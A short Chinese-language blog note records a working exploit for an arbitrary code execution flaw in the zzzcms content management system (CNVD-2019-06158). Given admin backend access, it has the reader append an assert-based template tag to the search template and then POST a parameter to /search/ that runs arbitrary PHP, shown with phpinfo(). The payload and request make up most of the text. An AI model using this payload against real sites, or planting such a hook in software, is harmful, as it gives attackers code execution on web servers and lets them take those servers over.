【笔记】zzzcms任意代码执行漏洞利用 发表于 2024-07-10 更新于 2025-12-19 阅读次数: 前言zzzcms任意代码执行漏洞利用CNVD-2019-06158https://expolit-db.com/exploits/46454 漏洞利用前提 已经登录管理员后台 exp 在搜索文件末尾追加{if:assert($_REQUEST['x'])}phpinfo();{end if} 在搜索时传递参数 request1234POST /search/Content-Type: application/x-www-form-urlencodedx=phpinfo() 完成